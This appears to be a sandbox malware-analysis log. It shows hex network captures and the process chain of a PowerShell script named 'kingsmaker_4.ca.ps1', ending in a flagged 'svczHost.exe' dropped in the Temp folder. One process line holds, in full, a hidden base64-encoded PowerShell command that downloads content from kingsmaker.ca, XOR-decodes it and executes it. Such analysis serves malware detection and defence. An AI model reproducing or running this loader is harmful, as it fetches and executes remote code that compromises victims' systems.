2024-11-29 08:24:25 UTC	1369	IN	Data Raw: 6e 2e 2e 2e 2e 2e 2c 2b 78 7a 57 5e 4b 2c 2e e2 3e 6e 2e 2c 2e 2e 2e 2c 27 7c 4b 5d 4b 5c 58 4b 4a 1f 2c 2e e2 3e 6e 2e 2a 2e 2e 2e 2c 27 7c 4b 5d 4b 5c 58 4b 4a 1c 2c 2e e2 3e 6e 2e 28 2e 2e 2e 2c 27 7c 4b 5d 4b 5c 58 4b 4a 1d 2c 2e ae 3e 6e 2e 26 2e 2e 2e 2c 27 78 7d 43 4f 42 42 67 40 5a 2c 2e b2 3e 6e 2e 26 2e 2e 2e 2c 26 78 67 40 5a 4b 49 4b 5c 2c 2e a2 3f 6e 2e 26 2e 2e 2e 2c 29 78 7d 47 40 49 42 4b 2c 2e 9e 3f 6e 2e 26 2e 2e 2e 2c 29 78 6a 41 5b 4c 42 4b 2c 2e fe 3f 6e 2e 26 2e 2e 2e 2c 27 78 6d 5b 5c 5c 4b 40 4d 57 2c 2e 0e 05 6e 2e 26 2e 2e 2e 2c 2b 78 6a 4f 5a 4b 2c 2e 3e 3c 6e 2e 26 2e 2e 2e 2c 29 78 61 42 4b 7d 5a 5c 2c 2e 2e 3f 6e 2e 26 2e 2e 2e 2c 27 78 6a 47 5d 5e 4f 5a 4d 46 2c 2e 06 3d 6e 2e 26 2e 2e 2e 2c 28 78 6b 5c 5c 41 5c 2c 2e 76 3c Data Ascii: n.....,+xzW^K,.>n.,...,'\|K]K\XKJ,.>n.*...,'\|K]K\XKJ,.>n.(...,'\|K]K\XKJ,.>n.&...,'x}COBBg@Z,.>n.&...,&xg@ZKIK\,.?n.&...,)x}G@IBK,.?n.&...,)xjA[LBK,.?n.&...,'xm[\\K@MW,.n.&...,+xjOZK,.><n.&...,)xaBK}Z\,..?n.&...,'xjG]^OZMF,.=n.&...,(xk\\A\,.v<
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: 6f 2e 28 6d 5c 4b 4f 5a 4b 2e 2e 2e 2e 2e 2e 2f 2e 7a 3f 6e 2e 28 6f 78 4f 42 5b 4b 2c 2e 2c 2e 24 9e 25 6f 2e 28 6d 5c 4b 4f 5a 4b 2e 2e 2e 2e 2e 2e 2f 2e 2e 3f 6e 2e 28 6f 78 4f 42 5b 4b 2c 2e 2c 2e 26 9a 25 6f 2e 27 7a 41 7e 41 47 40 5a 4b 5c 2e 2e 2e 3f 6e 2e 2e 2c 2e 26 96 25 6f 2e 27 7a 41 67 40 5a 4b 49 4b 5c 2e 2e 7a 3f 6e 2e 2e 2c 2e 25 92 25 6f 2e 22 08 41 5e 71 6b 5f 5b 4f 42 47 5a 57 2e 2e 2e 3e 6e 2e 2c 2e 26 1c 6e 2e 2a 62 4b 48 5a 2c 2e 2e 26 1c 6e 2e 2b 7c 47 49 46 5a 2c 2e 2c 2e 25 fa 25 6f 2e 20 08 41 5e 71 67 40 4b 5f 5b 4f 42 47 5a 57 2e 2e 2e 3e 6e 2e 2c 2e 26 1c 6e 2e 2a 62 4b 48 5a 2c 2e 2e 26 1c 6e 2e 2b 7c 47 49 46 5a 2c 2e 2c 2e 2e 5a 1d 6e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e 2e fa 64 6e 2e 2e 2e 2e 2e 5a 1d 6e 2e 2e 2e 2e 2e bc Data Ascii: o.(m\KOZK....../.z?n.(oxOB[K,.,.$%o.(m\KOZK....../..?n.(oxOB[K,.,.&%o.'zA~AG@ZK\...?n..,.&%o.'zAg@ZKIK\..z?n..,.%%o."A^qk_[OBGZW...>n.,.&n.bKHZ,..&n.+\|GIFZ,.,.%%o. A^qg@K_[OBGZW...>n.,.&n.bKHZ,..&n.+\|GIFZ,.,..Zn.............dn.....Zn.....
2024-11-29 08:24:25 UTC	1369	IN	Data Raw: b2 3e 6e 2e 26 2e 2b 6d 41 5b 40 5a 2c 2e 2c 2e 4c 2e fe 22 6f 2e 2a 6d 41 5e 57 2d 2e 2e 2e 2e 2e 3e 2e 2b 2e 2e 2e 2e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 2c 26 1c 6e 2e 2f 2e 2d 7d 5c 4d 2c 2e 2f e2 65 6e 2e 2c 2e 2a 6a 4b 5d 5a 2c 2e 2e b2 3e 6e 2e 22 2e 24 7d 5a 4f 5c 5a 67 40 4a 4b 56 2c 2e 2e b2 3e 6e 2e 26 2e 2b 6d 41 5b 40 5a 2c 2e 2c 2e 4c 2e de 22 6f 2e 2a 6d 41 5e 57 2d 2e 2e 2e 2e 2e 3e 2e 2b 2e 2e 2e 2e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 2c 2a 62 6e 2e 2f 2e 2d 7d 5c 4d 2c 2e 2e b2 3e 6e 2e 2c 2e 24 7d 5a 4f 5c 5a 67 40 4a 4b 56 2c 2e 2e 26 1c 6e 2e 22 2e 2a 6a 4b 5d 5a 2c 2e 2e b2 3e 6e 2e 26 2e 2b 6d 41 5b 40 5a 2c 2e 2c 2e 4c 2e 26 23 6f 2e 2a 6d 41 5e 57 2d 2e 2e 2e 2e 2e 3e 2e 2b 2e 2e 2e 2e 2e 2e 2e 2a 7d 4b 42 48 2c 2e 2c 26 1c 6e 2e 2f 2e 2d 7d Data Ascii: >n.&.+mA[@Z,.,.L."o.mA^W-.....>.+.......}KBH,.,&n./.-}\M,./en.,.jK]Z,..>n.".$}ZO\Zg@JKV,..>n.&.+mA[@Z,.,.L."o.mA^W-.....>.+.......}KBH,.,bn./.-}\M,..>n.,.$}ZO\Zg@JKV,..&n.".jK]Z,..>n.&.+mA[@Z,.,.L.&#o.mA^W-.....>.+.......*}KBH,.,&n./.-}

Target ID:	0
Start time:	03:22:06
Start date:	29/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1"
Imagebase:	0x7ff6a7210000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	03:22:15
Start date:	29/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x7ff6a7210000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	03:22:19
Start date:	29/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
Imagebase:	0x7ff642dd0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	03:22:49
Start date:	29/11/2024
Path:	C:\Windows\Temp\svczHost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Temp\svczHost.exe cakoi7 kingsmaker.ca
Imagebase:	0x7ff7fa630000
File size:	8'351'232 bytes
MD5 hash:	EB57894A8FF610DF55C97E427D0DDD7B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 67%, ReversingLabs
Has exited:	false